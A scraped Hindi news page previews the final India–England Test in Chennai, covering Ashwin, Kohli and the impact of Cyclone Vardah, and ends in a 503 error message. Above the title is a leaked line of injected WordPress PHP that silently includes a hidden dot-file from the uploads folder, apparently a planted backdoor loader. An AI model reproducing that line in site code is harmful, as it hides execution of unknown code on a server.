add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); इंग्लैंड ने जीता टॉस, पहले बल्लेबाज़ी – SOCH INDIA
Menu

खेल
इंग्लैंड ने जीता टॉस, पहले बल्लेबाज़ी

nobanner

भारत और इंग्लैंड के बीच जारी पांच मैचों की टेस्ट सीरीज का अंतिम मुकाबला आज से यहां के चेपक स्टेडियम में खेला जाएगा. भारतीय टीम सीरीज में 3-0 से आगे है तथा एक और जीत के साथ सीरीज अपने नाम करना चाहेगी. भारत ने मुम्बई में खेले गए चौथे टेस्ट मैच में एक पारी और 36 रनों की जीत के साथ सीरीज में अजेय बढ़त हासिल की है लेकिन वह इंग्लिश टीम पर किसी प्रकार की नरमी नहीं बरतना चाहेगी क्योंकि यह इस साल का उसका अंतिम टेस्ट मैच होगा और वह जीत के साथ नए साल में प्रवेश चाहेगी.

चेन्नई मैच भारत के स्टार स्पिनर रविचंद्रन अश्विन के लिए अहम होगा. अश्विन ने मुम्बई टेस्ट में 12 विकेट लेकर भारत की जीत तय की थी. वह इस सीरीज में भारत के लिए निर्णायक साबित हुए हैं. यही हाल कप्तान विराट कोहली का है. कोहली ने इस सीरीज में कई बेहतरीन पारियां खेली हैं. मुरली विजय, चेतेश्वर पुजारा और रवींद्र जडेजा ने भी अहम योगदान दिए हैं.

तमिलनाडु इन दिनों चक्रवाती तूफान वरदा से बुरी तरह प्रभावित है. इसका असर चेपक स्टेडियम पर भी पड़ा है. मैच से दो दिन पहले से ही पिच को कोयले की गर्मी से सुखाने का काम शुरू हो गया है. तमिलनाड़ु क्रिकेट संघ ने कहा है कि वह मैच कराने की स्थिति में है और इसके लिए उसने पूरी तैयारी कर रखी है.

दूसरी ओर, इंग्लिश टीम इस मैच को जीतकर स्वदेश जाना चाहेगी. क्रिसमस की छुट्टियों के बाद वह फिर से भारत लौटेगी और एकदिवसीय सीरीज खेलेगी लेकिन एलिस्टर कुक की टीम के लिए भारत को हरा पाना मुश्किल लग रहा है.

मुम्बई में पहली पारी में 400 रन बनाने के बाद भी यह टीम पारी के अंतर से हार गई. इससे उसका आत्मविश्वास काफी नीचे गया है. इससे उबरना उसके लिए आसान नहीं होगा. साथ ही स्पिनरों को ठीक से नहीं खेल पाने की कमी ने उसे नुकसान पहुंचाया है.

कुक अपनी टीम को एक जीत के लिए प्रेरित करेंगे. वह अपने देशवासियों को क्रिसमस का उपहार देना चाहेंगे और साथ ही साथ बढ़े हुए मनोबल के साथ स्वदेश लौटना चाहेंगे. अब देखने वाली बात यह है कि चेपक की पिच का रुख दिखाती है क्योंकि दोनों टीमों का संयोजन काफी हद तक इसी बात पर निर्भर करेगा.

वैसे कोहली द्वारा टीम में परिवर्तन की कम उम्मी है लेकिन फिर भी वह कुछ ऐसे खिलाड़ियों को आजमाने के बारे में सोच सकते हैं, जिन्हें इस सीरीज में अब तक मौका नहीं मिला है. साथ ही कोहली अपने व्यक्तिगत प्रदर्शन के जारी रखते हुए आईसीसी रैंकिंग में प्रगति जारी रखना चाहेंगे. अभी वह बल्लेबाजों की तालिका में दूसरे स्थान पर हैं.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.